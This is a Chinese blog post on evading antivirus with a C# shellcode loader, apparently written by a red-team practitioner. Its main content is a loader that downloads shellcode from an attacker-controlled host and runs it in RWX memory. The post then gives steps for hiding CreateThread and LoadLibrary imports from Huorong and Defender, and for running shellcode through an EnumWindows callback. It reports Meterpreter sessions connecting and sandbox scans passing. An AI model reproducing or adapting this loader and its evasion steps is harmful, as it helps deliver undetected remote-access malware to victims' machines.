【红队技巧】.Net免杀 绕过主流杀软

于 2024-08-26 23:45:00 发布
阅读量1.8k 收藏 47
点赞数 24
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: .net 渗透测试 TryHackMe 网络安全 红队行动 免杀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/141567326
版权

【技巧】.Net免杀 绕过主流杀软

前言

最近执行任务时,需要动用自己的免杀知识却发现它们不再生效,于是就有了本文。这次对windows api和C#又有了比在thm​学习时更深的认识和了解。

  • C#动态加载
  • LoadLinrary受限绕过
  • EnumWindows函数执行shellcode

C#动态加载 - 火绒

我在执行任务时,我惊讶的发现,我的TryHackMe 祖传C#代马 steged分阶段加载器,居然被火绒落地秒杀

在这里插入图片描述

虽然360、defender不会报毒,但落地被火绒秒杀属实有点对不起thm大学的知识

伪代码:

    [DllImport("kernel32")]
    private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
    
    string URI = "http://<ip>:<port>/<fileName>";
    WebClient webClient = new WebClient();
    webClient.DownloadData(URI);

    VirtualAlloc(0, (UInt32)State.Length, 0x1000, 0x40);
    Marshal.Copy(State, 0, (IntPtr)(Open), State.Length);
    
    CreateThread(0, 0, Open, parameter, 0, ref threadId);
    WaitForSingleObject(QQHandle, 0xFFFFFFFF);
    }

我针对代码,自下而上进行单行注释,直到p/invoke的CreateThread函数,当我把这个函数签名这一行给注释掉后,火绒就不杀了,结论就是:火绒碰到p/invoke的CreateThread立马干掉

我尝试了CreateRemoteThread,这并不会导致被杀,也就是说目前可以确定火绒只会针对:

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

换句话说只要IAT表或导入表里有CreateThread,立马就杀,所以这段代码不管怎么改也绕不过去

解决方案 - 动态加载

我总觉得我学过,但太久没用有点回忆不起来,我翻了翻曾经在thm上学的知识,最终还是找到了它

在这里插入图片描述

这是C++版本的动态加载,通过LoadLibrary函数动态加载dll到内存,最后通过GetProcAddress函数获取指定的函数地址,最终实现调用指定dll的指定函数

C#的实现

即便通过C#,想要做到这一点也相当简单,我们只需要通过委托来替代c++中的定义结构

首先我们需要通过p/invoke加载LoadLibrary和GetProcAddress,并且获取CreateThread函数的函数地址

[DllImport("kernel32.dll")]
static extern IntPtr LoadLibrary(string _);

[DllImport("kernel32.dll")]
static extern IntPtr GetProcAddress(IntPtr __, string _);

...

h_Module = LoadLibrary("kernel32.dll");
fooProc = GetProcAddress(h_Module, "CreateThread");

创建委派,函数签名的参数个数、类型与CreateThread函数参数个数、类型一致

然后通过GetDelegateForFunctionPointer函数将函数指针转换成委托

private delegate IntPtr _ct(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

...

var ct = Marshal.GetDelegateForFunctionPointer<ct>(fooProc);

这样,我们就可以通过委托去执行CreateThread函数了,对完整修改并编译后,火绒最终还是失效了

Windows Denfender - LoadLinrary受限绕过

通过上述方法绕过火绒后,没想到回头被defender给干掉了,我通过同样的思路,对代码进行单行注释,结果发现defender的检测点是p/invoke的LoadLibrary函数,于是我去微软文档寻找函数平替。

最后发现GetModuleHandleA函数,它于LoadLibrary函数类似,但GetModuleHandleA不会被defender检测,通过它,我们成功绕过defender、火绒在对于IAT/导入表中某些函数的检测

msf meterpreter常规反向上线正常

在这里插入图片描述

defender静态、执行不报

在这里插入图片描述

火绒、360静态不报

执行也不报

msf meterpreter上线

在线检测

基本上到这里也差不多够用,再通过其它thm、前辈的小技巧,混淆、加壳、签名等等,基本应该也够用了

我这里就不作代码以外的事情,直接把上面的完整C#代码编译后,不作任何加壳签名啥的,直接裸上传沙箱看看效果

微步云沙箱

微步云沙箱最终被标记为安全

在这里插入图片描述

没有高危行为

在这里插入图片描述

被一个Baidu-China检测了,其它全都不报

在这里插入图片描述

当然,如果不绕沙箱的话,最终的shellcode应该还是会被捕获并检测,毕竟shellcode是正版msf的payload,但绕沙箱不在本文范围。

EnumWindows执行shellcode - CreateThread平替

此外我通过搜索微软文档,发现了一个函数可以通过callback回调函数,达到执行shellcode的效果

EnumWindows

只要把shellcode的地址丢给它,它便能执行,做到类似于CreateThread+WaitForSingleObject的效果

Sugobet
关注
专栏目录
VC写的加密壳源码,可以免杀作用,代码清晰
12-06
可以对PE进行加密加壳操作,非常好,而且可以免杀,也能叫他免杀壳,里面对PE文件分析比较清晰,可以下去研究一下
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1453
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
实战shell免杀&C2远控&工具魔改(免杀日记 - 上篇)
guanjian_ci的博客
06-05 2830
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过杀毒软件的本质就是防止被杀毒库匹配,代码、工具指纹等等!3、一个好的免杀,一定具备了多方面的性能:防杀软绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
Windows-Server-2016/2019绕过WindowsDefender
最新发布
qq_59468567的博客
08-22 490
该代码利用golang中的syscall包来调用NewLazyDLL 方法来加载Kernel32.dll,加载Kernel32.dll后,即可将其用于寻址和内存分配。由于代码存在许久,可能直接使用会被检测到,这里对其进行了修改,重命名所有变量,通过URL方式加载shellcode,为了绕过沙盒,添加了一些其他的参数,如果不存在参数则退出执行。Windows Server 2016和2019上的Microsoft Defender Antivirus自动将您注册为某些排除项,具体由您指定的服务器角色定义。
免杀.net程序一键免杀Win10 20H2 Defender
K8哥哥
12-18 1731
WIN10更新至最新版20H2发现,查杀能力比以前强了不少,特别是针对CS加载.NET程序集或NIM加载.NET的查杀,毕竟你要调用的函数微软很了解,它想拦截想杀还是比较容易的。但是不知道大家有没听说过一个故事“微软的编程工具的开发工程师,编写程序时,也需要查阅文档”,说明什么?微软系统的API很多,是微软写的没错,但又不是一个人自己写的,就算是一个人自己写的,功能那么多,他也根本记不起,用到自己的东西也要查阅文档,就像我用Ladon有时也要查阅文档,这很正常,因为我写过的工具或功能太多,有些久不用,甚至都
免杀QVM心得
0ffs3t
12-20 7934
HEUR/Malware.QVM06.Gen   一般情况下加数字签名可过 HEUR/Malware.QVM07.Gen   一般情况下换资源 HEUR/Malware.QVM13.Gen   加壳了 HEUR/Malware.QVM19.Gen   杀壳 (lzz221089提供 ) HEUR/Malware.QVM20.Gen   改变了入口点 HEUR/Malware.QVM27.
360QVM_bypass:突破安全扫描的智能解决方案
gitblog_00084的博客
03-30 645
360QVM_bypass:突破安全扫描的智能解决方案 项目地址:https://gitcode.com/Pizz33/360QVM_bypass 项目简介 360QVM_bypass 是一个开源项目,旨在帮助开发者和安全研究人员绕过360安全卫士的QVM(全名Quantum Virtual Machine)引擎的检测。QVM是360公司用于扫描和识别潜在恶意软件的一种高级沙箱技术。此项目的目的是...
windows守护进程,开机自动重启,进程监测
08-15
使用.net core开发的web项目,使用控制台方式运行的。同一份程序放在不同目录,而且采用了启动多个实例实现了负载(服务器资源充足)。因为控制台程序出现过因为连接第三方服务超时直接挂掉(此时负载少了一个节点)以及服务器出现意外重启问题(该服务器所有节点宕机),所以需要一个进程守护程序。 也找过 现场的脚本、python的程序、pm2守护方式,感觉都不能满足要求。所以决定自己开发一个。
免杀对抗--知识点总结
金灰的博客
05-18 1375
文件和校验法。
AMSI对抗小结
热门推荐
wo41ge的博客
11-11 1万+
前言 AMSI是微软用来对抗无文件攻击而开发的安全模块,是当前攻防对抗前沿的技术 之一 从15年AMSI出现,越来越多的杀软厂商接入了AMSI接口,当前市面上主流杀软均接入此接口 这给当时以powershell为主的红队工具致命打击,像Empire,等等 总体来说,由于AMSI仅仅是一个连接应用程序和杀软程序的通道,微软主要还是在defender上做各种对抗,针对通道本身的加固较少。 红队工具也寻找了另外一条出路就是.Net,使用C#开发的红队工具随之兴起。 随着以.NET(C#)为基础的攻击技术的逐渐成熟
c++向其他进程注入代码的三种方式
03-29
c++向其他进程注入代码的三种方式 c++向其他进程注入代码的三种方式 c++向其他进程注入代码的三种方式 c++向其他进程注入代码的三种方式
红队攻防渗透技术实战流程:红队资产信息收集之单个目标信息收集
HACKONE的博客
03-25 925
根据目标网站的大小确定数据库类型首先,成本上的差距,access是不要钱的,mysql也是开源的,sql server 是收费的一般也就几千,Oracle的费用则数万。C段指的是同一内网段内的其他服务器,每个IP有ABCD四个段,举个例子,192.168.0.1,A段就是192,B段是168,C段是0,D段是1,而C段嗅探的意思就是拿下它同一C段中的其中一台服务器,也就是说是D段1-255中的一台服务器,然后利用工具嗅探拿下该服务器。有时候网站的响应包会携带server信息,如下,这种情况多存在内网中。
红队攻防渗透技术实战流程:红队目标信息收集之基础资产信息收集
HACKONE的博客
03-23 1094
红队渗透测试中,客户的合作至关重要,他们会提供目标资产的基本信息作为初始攻击面。红队行动范围通常是由客户明确授权界定的,这其中包括但不限于对主域名、下属子公司以及整个供应链体系中的相关资产进行安全测试。红队需严格按照约定的边界执行任务,可能涵盖但不限于对主域名下的各个子域名进行深度侦查,探究子公司间的网络互联情况,以及深入分析供应链各环节的软硬件设施、业务流程和数据交换点,以全方位评估和模拟真实攻击场景下的安全风险。在执行过程中,红队始终保持专业操守,确保所有行动均在合法、合规的前提下进行,并以增强客户
红队专题-Meterpreter
aming小老弟
09-06 678
Metasploit是一款开源的安全漏洞检测 渗透测试 工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
基于.net cf C# 实现杀进程
Windows Mobile 开发历险
01-17 2179
        最近挺忙的,很久没有写博客了,但是windows mobile开发却一直没有停止过。元旦前一天用我的Dopod575加钱换了个Dopod818,终于实现了Smartphone到Pocket PC的转变,不过Dopod818也是老机器了,似乎刷不了windows mobile 5.0。不过,也不在乎那么多了,最近在研究Pocket PC上的程序开,起初想用EVC++,但是感觉太底层了
使用进程镂空技术免杀360Defender
u013797594的博客
05-05 4376
使用进程镂空技术免杀360Defender,免杀工具风暴免杀
C# 进程防杀
weixin_34250434的博客
06-25 550
引用KProtectProcess.dll 然后NKCore.dll 是c++的类库放在同级目录就可以了。开始调用KProtectProcess.KProcess.SelfProtection();结束调用KProtectProcess.KProcess.UnLoadProtection();这样用户就无法在任务管理器的 进程 中杀掉你的程序了。 /Files/luomingui/进程防杀.rar...
网络攻防实战研究 漏洞利用与提权读书笔记一
一枚努力的蛋蛋
08-20 3043
网络攻防实战研究 漏洞利用与提权读书笔记
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值